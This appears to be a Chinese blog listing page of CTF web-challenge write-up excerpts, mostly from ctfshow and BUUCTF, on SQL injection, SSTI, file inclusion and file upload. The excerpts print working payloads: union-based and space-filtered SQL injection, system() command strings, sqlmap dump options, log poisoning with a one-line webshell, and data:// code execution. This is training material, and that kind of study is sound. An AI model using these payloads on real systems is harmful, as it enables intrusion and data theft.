CTF
文章平均质量分 58
鸡肋是鸡肋!
这个作者很懒,什么都没留下…
展开
-
[第三章 web 进阶] SSTI——WP
注:基类的子列表[127]为os(这台靶场上的python环境是127,每个python版本不一样,好比python3.9貌似没os了)4、测试是否存在模板注入url?password={{2*2}}2、进入网页发现password is wrong。3、猜测password为参数。查看当前目录下有那些文件。1、题目提示为SSTI。原创 2024-04-02 01:49:02 · 208 阅读 · 0 评论 -
Ctfhub-think_java-2020网鼎杯-朱雀组
唉,做ctfhub这道题的时候,发现网上几乎都是跟风用的这个命令来直接读取根目录下的flag,我看了buuctf上的这道题因为flag就在跟目录下,flag的名称并没有变化,故可以直接读到flag。但ctfhub上这道题,题目已经提示了flag在根目录下,且flag名字是随机的,故用该方法并不能直接读取到flag,所以只有反弹shell的命令来cat flag。原创 2022-12-27 19:29:11 · 443 阅读 · 5 评论 -
注入神器-----SqlMap的使用
sqlmapGET参数:-u 网址--dbs:获取注入点的所有数据库-D:指定数据库 --tables:获取指定的表-T:表名 --columns:获取表的指定字段-C:获取指定字段 --dump:把数据打印出来POST注入:先抓包,注入点的位置打个*号然后保存为txt文档-r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点--current-db:获取当前数据库sqlmap获取sh...原创 2022-05-28 20:04:03 · 1327 阅读 · 0 评论 -
渗透测试_需要验证的EXP编写
记一次笔记fsockopen — 打开一个网络连接或者一个Unix套接字连接参数:hostname:网址 port:端口 errstr:错误返回信息 timeout:超时时间靶机登录界面登录成功界面如果不登录直接访问main.php的话,是有账号密码验证的,是进不去的因为界面有session 进行验证h4pb2rtsfrsihh8h629emrm9s4所以抓包直接把session放进去试试这里...原创 2022-05-18 20:33:27 · 293 阅读 · 0 评论 -
CTF_ctfshow_签退
直接参数覆盖?S=a=system('cat ../../flag.txt');或?S=a;system('cat ../../flag.txt');原创 2022-05-17 14:42:53 · 359 阅读 · 0 评论 -
CTF_ctfshow_登录就有flag
打开靶机是一个登录界面,试了一下普通的sql注入,1' or 1=1#,不行所以这里用'^0#分号可以用于闭合,井号可以用于注释,^进行异或运算,等号就是判等,这里需要利用sql的一个点“mysql弱类型转换”,空异或0会查到所有非数字开头的记录...原创 2022-05-17 14:34:33 · 2408 阅读 · 0 评论 -
CTF_ctfshow_meng新_web1-web24
打开靶机,发现包含有个config.php文件,打开进去没有数据所以直接开始代码审计吧~有个变量为id,参数必须为1000才能获得flag,但id>999直接返回退出了。尝试一下sql注入整形注入:看一下回显点回显点为三版本:10.3.18-MariaDB数据库:web1?id=2 union select 1,2,database()#表:article?id=2 union select 1,2,group_concat.原创 2022-05-15 13:45:56 · 1411 阅读 · 0 评论 -
CTF_ctfshow_red包7
打开靶机,为phpinfo();没啥可利用的信息利用GitHack.py扫描一下有没有源码泄露扫到了:主页源码:后门代码:蚁剑直接连:http://e6133b80-a41f-40d5-9e1a-fc65438baf02.challenge.ctf.show/backdoor.php密码:Letmein发现flag:但打不开没关系,利用浏览器的HackBar插件继续查看该后门是否可用用post传参,参数为要执行的php函数变量为一句话...原创 2022-05-14 20:54:21 · 131 阅读 · 0 评论 -
CTF_webshow萌*专属red包题
进入靶机账号密码都是弱口令,可以爆出来账号:admin密码:admin888但这里好像扫描一下后台,把main.php后台扫到就行了直接抓个包,flag出来Flag: Y3Rmc2hvd3s5ZDU3NDQzYi04ZWJjLTRlNmQtODE2ZS0wZDk5N2VjOGNmMWZ9base64一波flag:ctfshow{9d57443b-8ebc-4e6d-816e-0d997ec8cf1f}...原创 2022-05-14 20:47:25 · 257 阅读 · 0 评论 -
【无标题】
http://56ea2c93-f022-45c9-b977-3f9e7bb1114a.challenge.ctf.show/secret.php/?c=3显示了一个文件访问一下有注入点,整形注入,直接上库名:-1/**/union/**/select/**/database()#表名:-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/...原创 2022-05-14 17:07:00 · 134 阅读 · 0 评论 -
CTF_ctfshow_web13_文件上传漏洞
打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak然后upload.php.bak下载下来了源码,进行审计:<?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_...原创 2022-05-14 16:07:45 · 1393 阅读 · 1 评论 -
CTF_ctfshow_web12
打开靶机,f12发现有提示hit:cmd=所以有个get传递的参数,变量为cmd利用phpinfo();函数看一下php配置文件?cmd=phpinfo();可以看见版本信息这些然后看一下当前目录下有哪些文件:?cmd=print_r(glob("*"));print_r(glob("*")):直接打印出来当前目录下的所有文件print_r(glob("*")):直接打印出来当前目录下的所有txt文件Array ( [0] => 903c...原创 2022-05-14 15:21:07 · 1082 阅读 · 1 评论 -
CTF_webshow_web11
d打开靶机,直接有源码查看一下<?php//过滤了如下关键字 function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } //密码进行长度对比,防止双写绕过...原创 2022-05-14 14:48:53 · 257 阅读 · 2 评论 -
CTF_ctfshow_web9_sql注入
打开靶机:手工注了一下,发现没有注入点,然后查看了一下robots.txt协议提示了index.phps访问一下下载下来了源码:<?php $flag=""; $password=$_POST['password']; //密码长度<10 if(strlen($password)>10){ die("password error"); } ...原创 2022-05-14 12:42:38 · 385 阅读 · 0 评论 -
CTF_webshow_web8盲注脚本
直接大佬脚本开始嗦:import requestsurl = 'http://438302a7-56ba-4098-ad0a-0f245da447b0.challenge.ctf.show/index.php?id=-1/**/or/**/'name = ''# 循环45次( 循环次数按照返回的字符串长度自定义)for i in range(1, 45): # 获取当前使用的数据库 # payload = 'ascii(substr(database()from/**/%d原创 2022-05-14 12:07:56 · 319 阅读 · 0 评论 -
CTF_ctfshow_web7_sql注入之过滤空格
打开靶机打开每一个列表,发现有一个id,所以为get传参ok,找一下注入点-2/**/union/**/select/**/1,2,3#这里发现过滤了空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3下面开始查库吧!-2/**/union/**/select/**/1,database(),version();#库名:web7版本:10.3.18-MariaDB查表:-2/**/union/**/select/**/1,gr...原创 2022-05-14 11:34:07 · 459 阅读 · 0 评论 -
CTF_ctfshow_web6
过滤了空格一般空格被过滤有如下替换方法/**/()回车(url编码中的%0a)`(tap键上面的按钮)tap两个空格这里选择/**/1'/**/union/**/select/**/1,2,3#回显为2查看数据库名:1'/**/union/**/select/**/1,database(),3#查看表名:1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_sc原创 2022-05-13 22:17:49 · 419 阅读 · 0 评论 -
CTF_ctfshow_web5
打开靶机:php代码审计:所以综上为md5弱碰撞满足v1为数字类型且v2为字符类型且md5加密之后类型相等php中:如果0=="0e830400451993494058024219903391"则会把右边的转化为数字类型0md5加密后0e开头的有:QNKCDZO0e8304004519934940580242199033912406107080e462097431906509019562988736854s878926199a0e54599327.原创 2022-05-13 21:57:24 · 311 阅读 · 0 评论 -
CTF_ctfshow_web4
打开网页发现和web3差不多,文件包含url但尝试了web3,发现error了伪协议用不了了可以尝试用一句话连接,bp抓包,上传一句话但一句话不知道是传到了哪个路径下,查看网络:发现是nginx,nginx的日志文件在/var/log/ngnix/access.log或/var/log/ngnix/error.log故,一句话可以传到日志目录下将User-Agent这里写进一句话上传成功:路径:ctf.show_web4http://f30ab..原创 2022-05-13 21:17:16 · 889 阅读 · 1 评论 -
CTF_ctfshow更简单的web题
打开靶机,发现为文件包含,变量为url直接先试一下能不能读取到靶机的文件url=/etc/passwd发现可以读文件包含用五种常用的php为协议:(47条消息) 五种常见的php伪协议_浪_zi的博客-CSDN博客_php伪协议这位师傅的博客中讲的很清楚,可以去看看我们这里用的是data://text/plain,<?php ?>伪协议1、直接执行php代码,查看当前目录下有哪些文件,构造payloadurl=data://text/plain,<...原创 2022-05-13 20:55:51 · 188 阅读 · 0 评论 -
CTF_CTFSHOW入门sql注入_web2
打开靶机,用户名和密码顺便输一下1' union select 1,2,3#后面#为注释,把后面内容注释掉,因为数据库中构造的sql语句可能后面还有其它内容,或者是字符型注入把前面单引号给闭合掉。我是这样理解的(大佬勿喷)发现回显点是2,为字符型注入顺序:1:查数据库版本version();、查数据库名database();2:查表:group_concat(table_name) from information_schema.tables where table_na...原创 2022-05-13 20:32:34 · 293 阅读 · 0 评论 -
BUUCTF_web_禁止套娃,wp
打开靶机之后,f12并没有发现什么,用dirsearch扫描了一波目录也并没有发现什么有用的信息然后GitHack尝试了一下,发现是源码泄露获得源代码:<?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'...原创 2022-05-10 13:55:58 · 148 阅读 · 0 评论